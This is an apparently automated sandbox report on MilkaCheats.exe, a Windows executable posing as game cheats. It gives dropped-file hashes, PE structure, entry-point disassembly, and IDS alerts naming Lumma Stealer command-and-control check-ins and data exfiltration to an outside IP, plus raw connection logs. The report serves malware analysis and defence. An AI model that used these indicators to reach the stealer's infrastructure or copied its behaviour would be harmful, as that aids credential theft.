                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.1.7.4.9.7.3.1.8.7.1.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.1.7.4.9.7.6.7.8.0.7.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.a.f.3.7.f.7.-.0.4.9.1.-.4.4.0.5.-.b.1.1.e.-.4.7.8.f.3.6.9.d.a.e.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.4.1.8.c.8.3.-.b.6.0.f.-.4.b.f.3.-.a.7.3.2.-.c.1.f.3.e.5.7.d.0.3.c.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.i.l.k.a.C.h.e.a.t.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.n.t...E.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.5.8.-.0.0.0.1.-.0.0.1.4.-.a.3.1.e.-.0.1.2.c.8.7.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.e.5.4.0.5.c.0.9.3.1.4.a.4.8.c.f.0.3.5.8.0.6.f.1.b.0.a.4.c.d.d.d.8.9.d.f.0.4.d.5.!.M.
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Oct 27 15:44:57 2024, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):36302
                                                                                            Entropy (8bit):1.7105919693502731
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:548gGxH6g+64rzeroMQi73J+ufXImAW/1mMuIL2WIcWIxEIGdWWdA2Em:lzIr8QOVl/1mMRKdWWdd
                                                                                            MD5:16BF2425BC6BD476C1E650228AE6510F
                                                                                            SHA1:6F5C8E150A053CF5461EBB266AFE4219ECA4B085
                                                                                            SHA-256:F4B494DBB483989122F909D63D31681D47A6D1CC58317FCEE77992EE48CEFB13
                                                                                            SHA-512:FF39E0AA6C94749520AF1EBCD1753DEE64DFE11192DAAD7066B8EEF90A357F0BE61A6E95987DEBDC0BB94384C4B75762A08B1D9C205962C7135B202A1ED06C40
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:MDMP..a..... ........_.g........................X...............\...........T.......8...........T......................................................................................................................eJ......x.......GenuineIntel............T.......X...._.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8420
                                                                                            Entropy (8bit):3.6995458718009133
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJeg626Y9sSU9D4gmfuxNprQ89bUnsfcQ8m:R6lXJp626YmSU9D4gmfuxdUsf/
                                                                                            MD5:D4E4FA8BF1A60116F3B550DB4BCFBBAB
                                                                                            SHA1:238F2FDF0582D43B73C6849335C274653FB9557D
                                                                                            SHA-256:654A40021AB04E5406DC97590138ADDE9F3BC8982677A47B646D437703CE1273
                                                                                            SHA-512:A90DC4B959D1F2E7D6B79348A55DA97EA84633EC805373579A062818251B7885121FE4D1503537C59DF137937AA45B1C6AD8A148AA56D3B1C79E8C5DBBAD9CF3
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.3.2.<./.P.i.
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4805
                                                                                            Entropy (8bit):4.48949414494656
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zsCJg77aI9LwWpW8VYvYm8M4Jq6o6aHFZS+q8vt6a02aQQMZUZ4d:uIjfQI7xJ7VfJq6o6dKt6HxQQMZUZ4d
                                                                                            MD5:C63B857ABA8C65E9D16970D0C9A965B5
                                                                                            SHA1:88AB2A4A1C167502A72ACC5EFAC7E20F125F9AC4
                                                                                            SHA-256:F4A38B4A5315CB49DF713ADBA3A63695F5C8B84B6F2F70CEC9E968C40CED91A7
                                                                                            SHA-512:81A7FFCC1F546690A8F74187FBC8AD3137E17A6434F9FFBD25F2315F5756EC59EFC649F74FC774152ABA9FB2C57CB8D9B2204115ACFD5EC5AF816912B4D40F73
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="562007" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                            Process:C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):400
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:rj:X
                                                                                            MD5:8BD30F5E64692F2971D94D201A7BDDBC
                                                                                            SHA1:1445B76763A443E3660BF686365374B5AA0407EA
                                                                                            SHA-256:EF938B9C248649B6EB4C1532F87EF94A8179E15D56EB8BA68EF92BCE2E68B7C1
                                                                                            SHA-512:37B0A14A1A21FD74BAD140477BE394816CD11D6778DE1007963B1EB9B81C0E246E1D779B40D3D863A6CB150AA4D5904D7492F607A8BE054B2D0281A78319CE56
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.465975195498067
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNydwBCswSbI:BXD94+WlLZMM6YFHk+I
                                                                                            MD5:961607C118A55B61C64E8BE906AAED59
                                                                                            SHA1:692808C67B54330080B6B4598CB5D15F068057DA
                                                                                            SHA-256:DECA3B8F2E2CFD10B5244534C1963EB49EBDF0687E4CF2E60FC11F5EADA5A387
                                                                                            SHA-512:BD91F77C1730C5F36A1704FF9F6CAB29C5FF5BAA2C8AA1C524CCE7DBD97B7F47D3220874DF92EA938C704BFF61AC91BCCD96C2CD48DE87BF2AFC081111A9B57F
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...,.(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.688738402361233
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:MilkaCheats.exe
                                                                                            File size:536'576 bytes
                                                                                            MD5:906c60b268404ecda308e2692a3aaaf8
                                                                                            SHA1:e5405c09314a48cf035806f1b0a4cddd89df04d5
                                                                                            SHA256:91a240e27b2849592fea2a6f326afedfc77c60d480126f5f9c57653a889b3dcf
                                                                                            SHA512:2809902c60adba46bf7c0401ddb932fa6a8a1b99960a891a4dba4211f8258d2d793d867855198373ad1341a5c41eb7da8805403ea35992431a313f6fa0fe2be2
                                                                                            SSDEEP:12288:a1dxO9DRdaPHN+q7wJu//lrZBJQ2sNiylqzSer5:a89SDj5JQ2+7mr5
                                                                                            TLSH:9BB4F11175C08033D9B3293206F0E6715B3EB9714AA65EDF67C55FBE0F302D1EA21A6A
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.ni...:...:...:...;...:...;...:...;...:...;...:...;...:...;...:...:u..:...;^..:C..;...:C..:...:C..;...:Rich...:........PE..L..
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x406e80
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x671BDFAB [Fri Oct 25 18:12:59 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:15c1a3252578de27fcd7c556fbfdb6ef
                                                                                            Instruction
                                                                                            call 00007F890CFB4FF6h
                                                                                            jmp 00007F890CFB462Fh
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                            push esi
                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                            add ecx, eax
                                                                                            movzx eax, word ptr [ecx+14h]
                                                                                            lea edx, dword ptr [ecx+18h]
                                                                                            add edx, eax
                                                                                            movzx eax, word ptr [ecx+06h]
                                                                                            imul esi, eax, 28h
                                                                                            add esi, edx
                                                                                            cmp edx, esi
                                                                                            je 00007F890CFB47CBh
                                                                                            mov ecx, dword ptr [ebp+0Ch]
                                                                                            cmp ecx, dword ptr [edx+0Ch]
                                                                                            jc 00007F890CFB47BCh
                                                                                            mov eax, dword ptr [edx+08h]
                                                                                            add eax, dword ptr [edx+0Ch]
                                                                                            cmp ecx, eax
                                                                                            jc 00007F890CFB47BEh
                                                                                            add edx, 28h
                                                                                            cmp edx, esi
                                                                                            jne 00007F890CFB479Ch
                                                                                            xor eax, eax
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            ret
                                                                                            mov eax, edx
                                                                                            jmp 00007F890CFB47ABh
                                                                                            push esi
                                                                                            call 00007F890CFB52F6h
                                                                                            test eax, eax
                                                                                            je 00007F890CFB47D2h
                                                                                            mov eax, dword ptr fs:[00000018h]
                                                                                            mov esi, 00482A68h
                                                                                            mov edx, dword ptr [eax+04h]
                                                                                            jmp 00007F890CFB47B6h
                                                                                            cmp edx, eax
                                                                                            je 00007F890CFB47C2h
                                                                                            xor eax, eax
                                                                                            mov ecx, edx
                                                                                            lock cmpxchg dword ptr [esi], ecx
                                                                                            test eax, eax
                                                                                            jne 00007F890CFB47A2h
                                                                                            xor al, al
                                                                                            pop esi
                                                                                            ret
                                                                                            mov al, 01h
                                                                                            pop esi
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            cmp dword ptr [ebp+08h], 00000000h
                                                                                            jne 00007F890CFB47B9h
                                                                                            mov byte ptr [00482A6Ch], 00000001h
                                                                                            call 00007F890CFB49ACh
                                                                                            call 00007F890CFB7899h
                                                                                            test al, al
                                                                                            jne 00007F890CFB47B6h
                                                                                            xor al, al
                                                                                            pop ebp
                                                                                            ret
                                                                                            call 00007F890CFC0F58h
                                                                                            test al, al
                                                                                            jne 00007F890CFB47BCh
                                                                                            push 00000000h
                                                                                            call 00007F890CFB78A0h
                                                                                            pop ecx
                                                                                            jmp 00007F890CFB479Bh
                                                                                            mov al, 01h
                                                                                            pop ebp
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            cmp byte ptr [00482A6Dh], 00000000h
                                                                                            je 00007F890CFB47B6h
                                                                                            mov al, 01h
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2dbcc0x3c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x595.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x850000x1bdc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x2beb80x1c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bdf80x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x240000x148.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x22f2e0x230004da3a75dbd74dc877bf127c55bdda469False0.5811732700892858data6.646705992844183IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x240000xa3280xa4008936a0b6950510a54f01ca3041031b55False0.4328791920731707OpenPGP Public Key4.945790274654163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x2f0000x545780x53600fa6c5f641266ff2bb8199c02b0ca89faFalse0.9909225074962519OpenPGP Public Key7.992273569021661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x840000x5950x6004d5387608e55814216b03d2ac9e670b3False0.4420572916666667data3.9845156370208854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x850000x1bdc0x1c005d2927ae47e9e21cdc2a94ae35d94f02False0.7544642857142857data6.513957656076399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0x840a00x378dataEnglishUnited States0.46283783783783783
                                                                                            RT_MANIFEST0x844180x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                            DLLImport
                                                                                            USER32.dllwsprintfA
                                                                                            KERNEL32.dllTerminateProcess, WriteConsoleW, GetStdHandle, DeleteFileA, HeapAlloc, HeapFree, GetProcessHeap, GlobalFindAtomW, WriteConsoleA, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, SetEndOfFile, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, WriteFile, GetModuleFileNameW, ExitProcess, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, CreateFileW
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-10-27T16:44:59.376608+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.170.64443TCP
                                                                                            2024-10-27T16:44:59.376608+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.170.64443TCP
                                                                                            2024-10-27T16:45:01.669879+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732172.67.170.64443TCP
                                                                                            2024-10-27T16:45:01.669879+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.170.64443TCP
                                                                                            2024-10-27T16:45:09.623341+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741172.67.170.64443TCP
                                                                                            2024-10-27T16:45:10.787252+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449743172.67.170.64443TCP
                                                                                            2024-10-27T16:45:15.310166+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748172.67.170.64443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 27, 2024 16:44:57.998008966 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:57.998044014 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:57.998126984 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.001054049 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.001066923 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:58.623502016 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:58.623727083 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.628151894 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.628159046 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:58.628560066 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:58.685583115 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.881093979 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.881129026 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:58.881475925 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:59.376694918 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:59.376974106 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:59.377034903 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:59.397310019 CET49730443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:59.397320032 CET44349730172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:59.755223989 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:59.755342007 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:44:59.755420923 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:59.755745888 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:44:59.755781889 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:00.384258986 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:00.384354115 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:00.385989904 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:00.386018991 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:00.386359930 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:00.387784958 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:00.387824059 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:00.387883902 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.669938087 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670062065 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670146942 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670244932 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.670274019 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670301914 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670325041 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.670479059 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670533895 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.670572042 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670680046 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.670730114 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.670747042 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.716861963 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.716928959 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.763840914 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.789515018 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.789702892 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.789757013 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.789819002 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.789926052 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.789983988 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.789999962 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.790209055 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.790270090 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.790400982 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.790438890 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.790462971 CET49732443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.790477037 CET44349732172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.891400099 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.891438961 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:01.891518116 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.891820908 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:01.891839027 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:02.509381056 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:02.509624958 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:02.514960051 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:02.514981031 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:02.515422106 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:02.523485899 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:02.523686886 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:02.523757935 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:02.523847103 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:02.523863077 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.194401979 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.194639921 CET44349736172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.194662094 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.194684982 CET49736443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.287296057 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.287341118 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.287431955 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.287745953 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.287764072 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.902970076 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.903076887 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.904433966 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.904442072 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.904854059 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:03.912552118 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.912672043 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:03.912708044 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:05.526256084 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:05.526508093 CET44349738172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:05.526530027 CET49738443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:05.526576996 CET49738443192.168.2.4172.67.170.64
